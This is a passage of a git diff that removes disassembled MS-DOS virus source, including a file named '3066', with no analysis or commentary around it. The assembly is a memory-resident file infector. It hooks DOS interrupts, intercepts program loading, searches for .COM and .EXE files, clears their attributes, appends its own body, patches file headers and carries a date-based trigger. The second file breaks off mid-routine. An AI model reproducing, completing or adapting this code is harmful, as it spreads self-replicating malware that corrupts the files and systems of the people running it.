dx:ax = reg * ax - jnc loc_31 ; Jump if carry=0 -loc_30: - call sub_25 ; (0896) - jmp short loc_26 ; (0364) -loc_31: - xchg ax,bx - mul cx ; dx:ax = reg * ax - add dx,bx - jc loc_30 ; Jump if carry Set - mov cs:data_37,ax ; (8344:08D0=0) - mov cs:data_38,dx ; (8344:08D2=0) - mov cs:data_39,cx ; (8344:08D4=0) - call sub_25 ; (0896) - call sub_22 ; (0875) - or al,al ; Zero ? 
- jz loc_32 ; Jump if zero - cmp al,3 - jne loc_34 ; Jump if not equal -loc_32: - call sub_24 ; (0884) - cmp ah,27h ; ''' - mov ax,cs:data_39 ; (8344:08D4=0) - jnz loc_33 ; Jump if not zero - mul cx ; dx:ax = reg * ax - jc loc_30 ; Jump if carry Set -loc_33: - push ax - mov ah,2Fh ; '/' - int 21h ; DOS Services ah=function 2Fh - ; get DTA ptr into es:bx - mov di,bx - pop ax - call sub_11 ; (0785) - call sub_25 ; (0896) -loc_34: - pop bp - iret ; Interrupt return -loc_35: - cmp ax,4B00h - je loc_38 ; Jump if equal - cmp ax,4B01h - je loc_36 ; Jump if equal - jmp loc_23 ; (0342) -loc_36: - call sub_2 ; (042F) - jc loc_37 ; Jump if carry Set - push si - push di - push ds - push cs - pop ds - mov si,offset data_41 ; (8344:08E2=0) - lea di,[bx+0Eh] ; Load effective addr - cld ; Clear direction - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - pop ds - pop di - pop si -loc_37: - pushf ; Push flags - shr byte ptr [bp+6],1 ; Shift w/zeros fill - popf ; Pop flags - rcl byte ptr [bp+6],1 ; Rotate thru carry - pop bp - iret ; Interrupt return -loc_38: - call sub_2 ; (042F) - jc loc_37 ; Jump if carry Set - push ax - mov ah,51h ; 'Q' - int 21h ; DOS Services ah=function 51h - ; get active PSP segment in bx - mov ds,bx - mov es,bx - pop ax - cli ; Disable interrupts - mov sp,cs:data_41 ; (8344:08E2=0) - mov ss,cs:data_42 ; (8344:08E4=0) - inc sp - inc sp - sti ; Enable interrupts - jmp dword ptr cs:data_43 ; (8344:08E6=0) - -; -; SUBROUTINE -; - -sub_2 proc near - call sub_24 ; (0884) - stc ; Set carry flag - call sub_4 ; (051A) -loc_39: - mov ax,0Bh - jc loc_40 ; Jump if carry Set - cld ; Clear direction - pushf ; Push flags - push ds - mov ax,3522h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov cs:data_24,bx ; (8344:08B7=0) - mov word ptr cs:data_24+2,es ; (8344:08B9=8344h) - lds si,dword ptr [bp+0Ah] ; Load 32 bit ptr - push cs - pop es - mov di,offset data_39 ; 
(8344:08D4=0) - mov bx,di - mov cx,7 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - pop ds - call sub_16 ; (084C) - push dx - mov ax,4B01h - call sub_23 ; (0879) - pop dx - call sub_17 ; (0851) - jnc loc_42 ; Jump if carry=0 -loc_40: - mov [bp+8],ax -loc_41: - call sub_25 ; (0896) - retn -loc_42: - mov [bp+8],ax - mov ah,51h ; 'Q' - int 21h ; DOS Services ah=function 51h - ; get active PSP segment in bx - mov es,bx - mov si,[bp] - lds dx,dword ptr ss:[si+2] ; Load 32 bit ptr - mov es:data_11e,dx ; (08D4:000A=2F9h) - mov es:data_12e,ds ; (08D4:000C=3872h) - mov ax,2522h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - popf ; Pop flags - jnz loc_41 ; Jump if not zero - push cs - pop ds - mov si,data_51e ; (8344:0904=44h) - mov di,data_13e ; (08D4:0100=0DFh) - mov cx,7ABh - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - call sub_7 ; (0758) - jz loc_44 ; Jump if zero -loc_43: - clc ; Clear carry flag - jmp short loc_41 ; (0470) -loc_44: - mov di,bx - add di,10h - mov ax,ds:data_55e ; (8344:10B1=0) - mov word ptr data_43,ax ; (8344:08E6=0) - mov ax,ds:data_56e ; (8344:10B3=0) - add ax,di - mov word ptr data_43+2,ax ; (8344:08E8=0) - mov cx,ds:data_54e ; (8344:10AF=0) - or cx,cx ; Zero ? 
- jz loc_43 ; Jump if zero - lds dx,dword ptr [bp+0Eh] ; Load 32 bit ptr - call sub_18 ; (0862) - jc loc_47 ; Jump if carry Set - mov bx,ax - push cx - push cs - pop ds - xor cx,cx ; Zero register - mov dx,ds:data_50e ; (8344:0902=0) - call sub_20 ; (086B) - mov dx,904h - pop cx - -locloop_45: - push cx - mov cx,4 - call sub_8 ; (0764) - pop cx - jc loc_46 ; Jump if carry Set - mov si,dx - push ds - mov ax,[si+2] - mov si,[si] - add ax,di - mov ds,ax - add [si],di - pop ds - loop locloop_45 ; Loop if cx > 0 - - call sub_19 ; (0867) - jmp short loc_43 ; (04A8) -loc_46: - call sub_19 ; (0867) -loc_47: - push es - pop ds - les bx,dword ptr cs:data_24 ; (8344:08B7=0) Load 32 bit ptr - mov ds:data_17e,bx ; (8344:000A=0) - mov ds:data_18e,es ; (8344:000E=8344h) - call sub_13 ; (07EC) - stc ; Set carry flag - jmp loc_39 ; (0436) -sub_2 endp - - -; -; SUBROUTINE -; - -sub_3 proc near - clc ; Clear carry flag - -; External Entry into Subroutine - -sub_4: - push ax - push bx - pushf ; Push flags - call sub_18 ; (0862) - jc loc_48 ; Jump if carry Set - mov bx,ax - popf ; Pop flags - pushf ; Push flags - call sub_6 ; (0533) - pushf ; Push flags - call sub_19 ; (0867) - popf ; Pop flags -loc_48: - pop bx - pop bx - pop ax - retn -sub_3 endp - - -; -; SUBROUTINE -; - -sub_5 proc near - clc ; Clear carry flag - -; External Entry into Subroutine - -sub_6: - cld ; Clear direction - call sub_24 ; (0884) - pushf ; Push flags - push bx - mov ax,1220h - int 2Fh ; ??INT Non-standard interrupt. - jc loc_49 ; Jump if carry Set - xor bh,bh ; Zero register - mov bl,es:[di] - mov ax,1216h - int 2Fh ; ??INT Non-standard interrupt. 
- jnc loc_50 ; Jump if carry=0 -loc_49: - call sub_25 ; (0896) - retn -loc_50: - push es - push cs - pop ds - mov ax,3523h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_26,bx ; (8344:08BB=0) - mov word ptr data_26+2,es ; (8344:08BD=8344h) - inc ax - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_28,bx ; (8344:08BF=0) - mov word ptr data_28+2,es ; (8344:08C1=8344h) - mov ah,25h ; '%' - mov dx,offset int_24h_entry - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - dec ax - inc dx - inc dx - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop es - pop bx - mov al,2 - xchg al,es:[di+2] - mov data_33,al ; (8344:08C9=0) - mov ax,es:[di+5] - mov data_34,ax ; (8344:08CA=0) - mov ax,es:[di+15h] - mov data_37,ax ; (8344:08D0=0) - mov ax,es:[di+17h] - mov data_38,ax ; (8344:08D2=0) - mov ax,es:[di+11h] - mov dx,es:[di+13h] - mov data_35,ax ; (8344:08CC=0) - mov data_36,dx ; (8344:08CE=0) - cmp ax,1Ah - sbb dx,0 - jc loc_55 ; Jump if carry Set - popf ; Pop flags - jc loc_52 ; Jump if carry Set - mov ax,es:[di+28h] - cmp ax,5845h - je loc_51 ; Jump if equal - cmp ax,4F43h - jne loc_55 ; Jump if not equal - mov al,4Dh ; 'M' -loc_51: - cmp al,es:[di+2Ah] - jne loc_55 ; Jump if not equal -loc_52: - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_20 ; (086B) - mov dx,8EAh - mov cl,1Ah - call sub_8 ; (0764) - jc loc_57 ; Jump if carry Set - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_7 ; (0758) - jnz loc_53 ; Jump if not zero - mov ax,data_47 ; (8344:08F2=0) - mov dl,10h - mul dx ; dx:ax = reg * ax - mov cx,dx - mov dx,ax -loc_53: - push cx - push dx - add dx,7ABh - adc cx,0 - cmp cx,data_36 ; (8344:08CE=0) - jne loc_54 ; Jump if not equal - cmp dx,data_35 ; (8344:08CC=0) -loc_54: - pop dx - pop cx - jbe loc_56 ; Jump if below or = -loc_55: - jmp short loc_62 ; (065D) -loc_56: - push cx - push dx - call sub_20 ; 
(086B) - mov dx,904h - mov cx,7ABh - call sub_8 ; (0764) - jnc loc_58 ; Jump if carry=0 -loc_57: - jmp short loc_60 ; (0656) -loc_58: - push es - push di - push cs - pop es - mov si,data_53e ; (8344:09EF=0) - mov di,offset ds:[1EBh] ; (8344:01EB=1Eh) - mov cx,0C3h - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - pop di - pop es - jnz loc_65 ; Jump if not zero - mov dx,cx - call sub_21 ; (0870) - mov cx,7ADh - mov dx,904h - call sub_7 ; (0758) - jnz loc_59 ; Jump if not zero - add cx,6 -loc_59: - add es:[di+11h],cx - adc word ptr es:[di+13h],0 - call sub_8 ; (0764) - jc loc_60 ; Jump if carry Set - mov si,dx - dec cx - dec cx - call sub_10 ; (0778) - cmp dx,[si] - je loc_61 ; Jump if equal -loc_60: - stc ; Set carry flag - jmp short loc_63 ; (0661) -loc_61: - cmp al,al - jmp short loc_63 ; (0661) -loc_62: - mov al,1 - cmp al,0 -loc_63: - pushf ; Push flags -loc_64: - mov si,offset data_33 ; (8344:08C9=0) - cld ; Clear direction - inc di - inc di - movsb ; Mov [si] to es:[di] - inc di - inc di - movsw ; Mov [si] to es:[di] - add di,0Ah - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - mov ax,2524h - lds dx,dword ptr data_28 ; (8344:08BF=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - dec ax - lds dx,dword ptr cs:data_26 ; (8344:08BB=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - popf ; Pop flags - call sub_25 ; (0896) - retn -loc_65: - test byte ptr es:[di+4],4 - jnz loc_62 ; Jump if not zero - mov ah,0Dh - int 21h ; DOS Services ah=function 0Dh - ; flush disk buffers to disk - push bx - push ds - push es - mov ax,3540h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_30,bx ; (8344:08C3=0) - mov word ptr data_30+2,es ; (8344:08C5=8344h) - mov al,13h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_22,bx ; (8344:08B3=0) - mov 
word ptr data_22+2,es ; (8344:08B5=8344h) - mov ah,25h ; '%' - lds dx,data_21 ; (8344:08AF=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov al,40h ; '@' -;* mov dx,offset loc_85 ;* - db 0BAh, 59h,0ECh - mov bx,0F000h - mov ds,bx - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop es - pop ds - pop bx - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_21 ; (0870) - mov cx,7ABh - mov si,904h - call sub_7 ; (0758) - jnz loc_66 ; Jump if not zero - add cx,6 - mov ax,data_46 ; (8344:08F0=0) - mov ds:data_54e,ax ; (8344:10AF=0) - mov ax,data_48 ; (8344:08FE=0) - mov ds:data_55e,ax ; (8344:10B1=0) - mov ax,ds:data_49e ; (8344:0900=0) - mov ds:data_56e,ax ; (8344:10B3=0) -loc_66: - push si - call sub_10 ; (0778) - mov [si],dx - pop dx - inc cx - inc cx - call sub_9 ; (076E) - jc loc_68 ; Jump if carry Set - pop dx - pop cx - call sub_20 ; (086B) - mov dx,100h - mov cx,7ABh - call sub_9 ; (076E) - jc loc_69 ; Jump if carry Set - call sub_7 ; (0758) - jnz loc_67 ; Jump if not zero - xor cx,cx ; Zero register - mov data_46,cx ; (8344:08F0=0) - mov data_48,dx ; (8344:08FE=0) - mov word ptr ds:data_49e,0FFF0h ; (8344:0900=0) - xor dx,dx ; Zero register - call sub_20 ; (086B) - mov dx,8EAh - mov cx,1Ah - call sub_9 ; (076E) - jc loc_69 ; Jump if carry Set -loc_67: - cmp al,al - jmp short loc_70 ; (073C) -loc_68: - mov al,1 - cmp al,0 - jmp short loc_70 ; (073C) -loc_69: - stc ; Set carry flag -loc_70: - pushf ; Push flags - mov ah,0Dh - int 21h ; DOS Services ah=function 0Dh - ; flush disk buffers to disk - push ds - mov ax,2513h - lds dx,dword ptr data_22 ; (8344:08B3=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov al,40h ; '@' - lds dx,dword ptr cs:data_30 ; (8344:08C3=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - jmp loc_64 ; (0662) -sub_5 endp - - -; -; SUBROUTINE -; - 
-sub_7 proc near - mov ax,data_45 ; (8344:08EA=0) - cmp ax,5A4Dh - je loc_ret_71 ; Jump if equal - cmp ax,4D5Ah - -loc_ret_71: - retn -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - mov ah,3Fh ; '?' - call sub_23 ; (0879) - jc loc_ret_72 ; Jump if carry Set - cmp ax,cx - -loc_ret_72: - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - mov ah,40h ; '@' - call sub_23 ; (0879) - jc loc_ret_73 ; Jump if carry Set - cmp ax,cx - -loc_ret_73: - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - push cx - xor dx,dx ; Zero register - -locloop_74: - lodsb ; String [si] to al - add dl,al - adc dh,0 - loop locloop_74 ; Loop if cx > 0 - - pop cx - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - push cs - pop ds - mov si,904h - mov bx,ax - mov cx,7ABh - call sub_7 ; (0758) - jnz loc_75 ; Jump if not zero - mov ax,data_47 ; (8344:08F2=0) - mov dx,10h - mul dx ; dx:ax = reg * ax - push bx - push di - call sub_12 ; (07BF) - pop di - pop bx - mov si,offset data_45 ; (8344:08EA=0) - mov cx,1Ah - mov ax,ds:data_54e ; (8344:10AF=0) - mov data_46,ax ; (8344:08F0=0) - mov ax,ds:data_55e ; (8344:10B1=0) - mov data_48,ax ; (8344:08FE=0) - mov ax,ds:data_56e ; (8344:10B3=0) - mov ds:data_49e,ax ; (8344:0900=0) -loc_75: - xor ax,ax ; Zero register - xor dx,dx ; Zero register - -; External Entry into Subroutine - -sub_12: - sub ax,data_37 ; (8344:08D0=0) - sbb dx,data_38 ; (8344:08D2=0) - jc loc_76 ; Jump if carry Set - jnz loc_ret_79 ; Jump if not zero - sub bx,ax - jbe loc_ret_79 ; Jump if below or = - add di,ax - jmp short loc_77 ; (07E2) -loc_76: - neg ax - adc dx,0 - neg dx - jnz loc_ret_79 ; Jump if not zero - sub cx,ax - jbe loc_ret_79 ; Jump if below or = - add si,ax -loc_77: - cmp cx,bx - jbe loc_78 ; Jump if below or = - mov cx,bx -loc_78: - cld ; Clear direction - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - -loc_ret_79: - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_13 proc near - pushf ; Push flags - call sub_24 ; (0884) - 
mov ah,49h ; 'I' - push ds - pop es - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - mov ah,49h ; 'I' - mov es,ds:data_8e ; (0046:002C=50h) - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - mov ah,50h ; 'P' - mov bx,ds:data_7e ; (0046:0016=0) - int 21h ; DOS Services ah=function 50h - ; set active PSP segmnt from bx - mov ax,2522h - lds dx,dword ptr ds:data_6e ; (0046:000A=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - call sub_25 ; (0896) - popf ; Pop flags - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_14 proc near - mov si,dx - cmp byte ptr [si],0FFh - jne loc_ret_80 ; Jump if not equal - add si,7 - -loc_ret_80: - retn -sub_14 endp - - -; -; SUBROUTINE -; - -sub_15 proc near - call sub_24 ; (0884) - call sub_14 ; (0814) - push cs - pop es - mov dx,904h - mov di,dx - cld ; Clear direction - lodsb ; String [si] to al - or al,al ; Zero ? - jz loc_81 ; Jump if zero - add al,40h ; '@' - mov ah,3Ah ; ':' - stosw ; Store ax to es:[di] -loc_81: - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - mov al,2Eh ; '.' 
- stosb ; Store al to es:[di] - movsw ; Mov [si] to es:[di] - movsb ; Mov [si] to es:[di] - xor al,al ; Zero register - stosb ; Store al to es:[di] - push es - pop ds - call sub_3 ; (0519) - call sub_25 ; (0896) - retn -sub_15 endp - - -; -; SUBROUTINE -; - -sub_16 proc near - push ax - mov ax,cs - jmp short loc_82 ; (0854) - -; External Entry into Subroutine - -sub_17: - push ax - xor ax,ax ; Zero register -loc_82: - push bx - push ds - mov bx,cs - dec bx - mov ds,bx - mov ds:data_16e,ax ; (8343:0001=0FFFFh) - pop ds - pop bx - pop ax - retn -sub_16 endp - - -; -; SUBROUTINE -; - -sub_18 proc near - mov ax,3D00h - jmp short loc_83 ; (0879) - -; External Entry into Subroutine - -sub_19: - mov ah,3Eh ; '>' - jmp short loc_83 ; (0879) - -; External Entry into Subroutine - -sub_20: - mov ax,4200h - jmp short loc_83 ; (0879) - -; External Entry into Subroutine - -sub_21: - mov ax,4202h - jmp short loc_83 ; (0879) - -; External Entry into Subroutine - -sub_22: - push word ptr [bp+6] - popf ; Pop flags - -; External Entry into Subroutine - -sub_23: -loc_83: - pushf ; Push flags - cli ; Disable interrupts - call dword ptr cs:data_20 ; (8344:08AB=0) - retn -sub_18 endp - - -; -; -; External Entry Point -; -; - -int_24h_entry proc far - mov al,3 -int_24h_entry endp - - -; -; -; External Entry Point -; -; - -int_23h_entry proc far - iret ; Interrupt return -int_23h_entry endp - - -; -; SUBROUTINE -; - -sub_24 proc near - pop cs:data_32 ; (8344:08C7=0) - push ds - push dx - push es - push bx - push ax - push cx - push si - push di - push bp - mov bp,sp - jmp short loc_84 ; (08A6) - -; External Entry into Subroutine - -sub_25: - pop cs:data_32 ; (8344:08C7=0) - mov sp,bp - pop bp - pop di - pop si - pop cx - pop ax - pop bx - pop es - pop dx - pop ds -loc_84: - jmp word ptr cs:data_32 ; (8344:08C7=0) -data_20 dd 00000h -data_21 dd 00000h -data_22 dw 0, 8344h -data_24 dw 0, 8344h -data_26 dw 0, 8344h -data_28 dw 0, 8344h -data_30 dw 0, 8344h -data_32 dw 0 -data_33 db 0 -data_34 
dw 0 -data_35 dw 0 -data_36 dw 0 -data_37 dw 0 -data_38 dw 0 -data_39 dw 0 - db 12 dup (0) -data_41 dw 0 -data_42 dw 0 -data_43 dd 00000h -data_45 dw 0 - db 0, 0, 0, 0 -data_46 dw 0 -data_47 dw 0 - db 10 dup (0) -data_48 dw 0 -sub_24 endp - - -seg_a ends - - - - end start - \ No newline at end of file diff --git a/0-9/3066 (9).ASM b/0-9/3066 (9).ASM deleted file mode 100755 index 70933dc..0000000 --- a/0-9/3066 (9).ASM +++ /dev/null 
@@ -1,1491 +0,0 @@
-
-PAGE 59,132
-
-;
-;
-; 3066
-;
-; Created: 19-Mar-89
-; Version:
-; Passes: 5 Analysis Options on: QRS
-;
-;
-;
-
-.286c
-
-data_1e equ 24h ; (0000:0024=45h)
-data_2e equ 26h ; (0000:0026=3D1h)
-data_3e equ 70h ; (0000:0070=0FF53h)
-data_4e equ 72h ; (0000:0072=0F000h)
-data_5e equ 80h ; (0000:0080=1094h)
-data_6e equ 82h ; (0000:0082=123h)
-data_7e equ 84h ; (0000:0084=109Eh)
-data_8e equ 86h ; (0000:0086=123h)
-data_9e equ 90h ; (0000:0090=156h)
-data_10e equ 92h ; (0000:0092=44Bh)
-data_11e equ 9Ch ; (0000:009C=0BCh)
-data_13e equ 0B3h ; (0000:00B3=1)
-data_14e equ 0C8h ; (0000:00C8=0DAh)
-data_15e equ 0D1h ; (0000:00D1=10h)
-data_16e equ 0DFh ; (0000:00DF=1)
-data_17e equ 0E3h ; (0000:00E3=1)
-data_18e equ 0EAh ; (0000:00EA=123h)
-data_19e equ 0ECh ; (0000:00EC=10DAh)
-data_20e equ 0EEh ; (0000:00EE=23h)
-data_21e equ 0F1h ; (0000:00F1=10h)
-data_22e equ 151h ; (0000:0151=0EAh)
-data_23e equ 153h ; (0000:0153=0A6F0h)
-data_24e equ 155h ; (0000:0155=0EAh)
-data_25e equ 449h ; (0000:0449=3)
-data_26e equ 972h ; (0000:0972=74h)
-data_27e equ 80h ; (00AE:0080=0FFh)
-data_28e equ 0A0h ; (5E5F:00A0=0FFh)
-data_29e equ 0F00h ; (5E5F:0F00=0FFh)
-data_30e equ 0FA0h ; (5E5F:0FA0=0FFh)
-data_31e equ 0FF60h ; (5E5F:FF60=0FFFFh)
-data_32e equ 0E0h ; (683D:00E0=0FFFFh)
-data_33e equ 0 ; (6FB8:0000=0)
-data_34e equ 4 ; (6FB8:0004=0)
-data_35e equ 5 ; (6FB8:0005=0)
-data_36e equ 87h ; (6FB8:0087=0)
-data_37e equ 0A0h ; (6FB8:00A0=0)
-data_38e equ 0DFh ; (6FB8:00DF=0)
-data_39e equ 0E0h ; (6FB8:00E0=0)
-data_40e equ 0E2h ; (6FB8:00E2=0)
-data_41e equ 0E3h ; (6FB8:00E3=0)
-data_42e equ 0E4h ; (6FB8:00E4=0)
-data_43e equ 0E6h ; (6FB8:00E6=0)
-data_44e equ 0E8h ; (6FB8:00E8=0)
-data_45e equ 0EAh ; (6FB8:00EA=0)
-data_46e equ 0ECh ; (6FB8:00EC=0)
-data_47e equ 0EEh ; (6FB8:00EE=0)
-data_48e equ 0EFh ; (6FB8:00EF=0)
-data_49e equ 0F1h ; (6FB8:00F1=0)
-data_50e equ 0F3h ; (6FB8:00F3=0)
-data_51e equ 0F5h ; (6FB8:00F5=0)
-data_93e equ 100h ; (7188:0100=0)
-data_94e equ 0E2h ; (969B:00E2=0) - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -3066 proc far - -start: - jmp loc_5 ; (0243) - db 01h,0B4h -data_54 dw 0CD09h ; Data table (indexed access) - ; xref 6FB8:0ADC, 0B5E, 0BA4, 0C67 - ; 0C7B, 0CCB, 0CD4 - db 21h,0B8h, 00h, 4Ch,0CDh, 21h - db 'This program only exists to beco' - - - - - - db 'me infected - COM version', 0Dh, 0Ah - - - - - db '$' - db 8Dh, 16h, 0Dh,0FFh,0FFh, 00h - db 01h, 8Ch -data_56 dw 4D10h ; Data table (indexed access) - ; xref 6FB8:0270, 02DC, 046C -data_57 dw 6FB8h ; Data table (indexed access) - ; xref 6FB8:0276, 02E0, 0470 -data_58 db 0 ; Data table (indexed access) - ; xref 6FB8:0387, 03C8, 0608, 06A4 - db 8Dh, 16h, 0Dh,0FFh,0FFh, 09h - db 0CDh, 21h,0B8h, 00h, 4Ch,0CDh - db '!This program on', 0Dh, 0Ah, '$' - - - - db 27 dup (0) - db 50h, 4Ch, 49h, 43h - db 60 dup (0) - db 01h, 3Fh - db 7 dup (3Fh) - db 43h, 4Fh, 4Dh, 20h, 00h - db 7 dup (0) - db 20h, 96h, 66h,0D7h, 12h, 4Ch - db 00h, 00h, 00h - db 'TSTJ3066.COM' - - db 00h, 00h, 01h, 3Fh - db 10 dup (3Fh) - db 10h, 05h - db 7 dup (0) - db 20h,0E9h, 11h,0B5h, 12h,0F6h - db 48h, 02h, 00h - db 'CAT-TWO.ARC' - - db 00h, 00h, 00h, 00h,0BCh, 0Eh - db 00h, 00h, 20h, 00h, 72h, 49h - db 73h, 12h,0EBh, 04h,0DDh, 0Ch - db 00h, 00h, 00h, 51h, 59h, 8Bh - db 0Fh, 20h, 00h - db 56h, 47h, 31h -loc_5: ; xref 6FB8:0100 - jmp short loc_6 ; (0247) - db 0F5h, 0Bh -loc_6: ; xref 6FB8:0243 - call sub_17 ; (08BB) - call sub_15 ; (0875) - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov ds:data_22e[si],si ; (0000:0151=0EAh) - add word ptr ds:data_22e[si],884h ; (0000:0151=0EAh) - mov ds:data_23e[si],cs ; (0000:0153=0A6F0h) - mov ds:data_17e[si],al ; (0000:00E3=1) - call sub_10 ; (076E) - mov dl,ds:data_94e[di] ; (969B:00E2=0) - mov ax,ds - push cs - pop ds - jnz loc_8 ; Jump if not zero - mov data_56[si],984h ; (6FB8:0151=4D10h) - mov data_57[si],ax ; (6FB8:0153=6FB8h) - cmp dl,0FFh - je loc_8 ; Jump 
if equal - mov ah,0Eh - int 21h ; DOS Services ah=function 0Eh - ; set default drive dl (0=a:) -loc_8: ; xref 6FB8:026E, 027D - mov byte ptr ds:[872h][si],80h ; (6FB8:0872=0FFh) - mov word ptr ds:data_48e[si],0 ; (6FB8:00EF=0) - mov ah,2Ah ; '*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dx=mon/day - cmp cx,7C4h - jge loc_9 ; Jump if > or = - jmp short loc_12 ; (02C2) - db 0BDh, 09h,0BCh, 0Eh, 00h -loc_9: ; xref 6FB8:0296 - jg loc_10 ; Jump if > - cmp dh,0Ch - jl loc_12 ; Jump if < - cmp dl,5 - jl loc_12 ; Jump if < - cmp dl,1Ch - jl loc_11 ; Jump if < -loc_10: ; xref 6FB8:029F - mov word ptr ds:[877h][si],0FFDCh ; (6FB8:0877=8EC0h) - mov byte ptr ds:[872h][si],88h ; (6FB8:0872=0FFh) -loc_11: ; xref 6FB8:02AE - cmp byte ptr [si+4],0F8h - nop ;*ASM fixup - displacement - jae loc_13 ; Jump if above or = -loc_12: ; xref 6FB8:0298, 02A4, 02A9, 0356 - mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) - jmp loc_30 ; (0460) - cmp byte ptr [si+4],0F8h - nop ;*ASM fixup - displacement - jae loc_13 ; Jump if above or = - or byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh) -loc_13: ; xref 6FB8:02C0, 02D0 - mov byte ptr ds:data_38e[si],0 ; (6FB8:00DF=0) - mov dx,data_56[si] ; (6FB8:0151=4D10h) - mov ds,data_57[si] ; (6FB8:0153=6FB8h) - mov ax,4300h - call sub_1 ; (0436) - jc loc_14 ; Jump if carry Set - mov cs:data_51e[si],cx ; (6FB8:00F5=0) - and cl,0FEh - mov ax,4301h - call sub_1 ; (0436) - jc loc_14 ; Jump if carry Set - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jc loc_14 ; Jump if carry Set - push cs - pop ds - mov ds:data_48e[si],ax ; (6FB8:00EF=0) - mov bx,ax - mov ax,5700h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ds:data_49e[si],cx ; (6FB8:00F1=0) - mov ds:data_50e[si],dx ; (6FB8:00F3=0) - dec byte ptr [si+4] - nop ;*ASM fixup - displacement - mov dx,word ptr ds:[880h][si] ; (6FB8:0880=687h) - mov cx,word ptr ds:[882h][si] ; (6FB8:0882=90h) - add dx,4 - nop ;*ASM fixup - 
sign extn byte - adc cx,0 - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset -loc_14: ; xref 6FB8:02EA, 02FA, 0301 - push cs - pop ds - test byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh) - jz loc_15 ; Jump if zero - call sub_3 ; (051F) - jmp loc_30 ; (0460) -loc_15: ; xref 6FB8:0337 - xor dl,dl ; Zero register - mov ah,47h ; 'G' - push si - add si,46h - int 21h ; DOS Services ah=function 47h - ; get present dir,drive dl,1=a: - pop si - cmp byte ptr ds:data_47e[si],0 ; (6FB8:00EE=0) - jne loc_16 ; Jump if not equal - call sub_2 ; (0444) - jnc loc_17 ; Jump if carry=0 -loc_16: ; xref 6FB8:034F - jmp loc_12 ; (02C2) -loc_17: ; xref 6FB8:0354, 0433 - mov dx,si - add dx,data_36e ; (6FB8:0087=0) - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx - mov word ptr [si+5],2E2Ah - mov word ptr [si+7],4F43h - mov word ptr [si+9],4Dh - mov ah,4Eh ; 'N' - mov dx,si - add dx,5 -loc_18: ; xref 6FB8:03A7 - mov cx,20h - call sub_1 ; (0436) - jc loc_21 ; Jump if carry Set - mov dx,si - add dx,0A5h - mov data_58[si],0 ; (6FB8:0155=0) - call sub_4 ; (0535) - jc loc_20 ; Jump if carry Set - call sub_3 ; (051F) -loc_19: ; xref 6FB8:039C - jmp loc_29 ; (0454) -loc_20: ; xref 6FB8:038F - cmp byte ptr ds:data_20e[si],0 ; (0000:00EE=23h) - jne loc_19 ; Jump if not equal - cmp byte ptr ds:data_24e[si],0 ; (0000:0155=0EAh) - jne loc_25 ; Jump if not equal - mov ah,4Fh ; 'O' - jmp short loc_18 ; (0379) -loc_21: ; xref 6FB8:037F - mov word ptr [si+7],5845h - mov word ptr [si+9],45h - mov ah,4Eh ; 'N' - mov dx,si - add dx,5 -loc_22: ; xref 6FB8:03E9 - mov cx,20h - call sub_1 ; (0436) - jc loc_25 ; Jump if carry Set - mov dx,si - add dx,0A5h - mov data_58[si],0 ; (6FB8:0155=0) - call sub_4 ; (0535) - jc loc_24 ; Jump if carry Set - call sub_3 ; (051F) -loc_23: ; xref 6FB8:03DE - jmp short loc_29 ; (0454) - db 90h -loc_24: ; xref 6FB8:03D0 - cmp byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) - jne loc_23 ; Jump if not equal - cmp byte ptr 
